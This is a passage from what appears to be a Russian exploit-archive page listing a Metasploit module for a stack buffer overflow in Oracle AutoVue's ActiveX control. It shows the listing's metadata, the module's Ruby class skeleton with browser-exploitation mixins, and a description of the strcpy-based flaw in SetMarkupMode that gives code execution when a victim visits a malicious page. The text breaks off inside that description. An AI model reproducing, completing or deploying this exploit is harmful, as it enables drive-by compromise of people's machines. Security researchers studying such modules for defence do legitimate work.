Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow Exploit

Свойства

Дата публикации:

05.08.2012

Цель:

Oracle AutoVue ActiveX Control

Тип воздействия:

Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::BrowserAutopwn

def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.
The vulnerability, due to the insecure usage of an strcpy like function in the
SetMarkupMode method, when handling a specially crafted sMarkup argument, allows
to trigger a stack based buffer overflow which leads to code execution under the
context of the user visiting a malicious web page.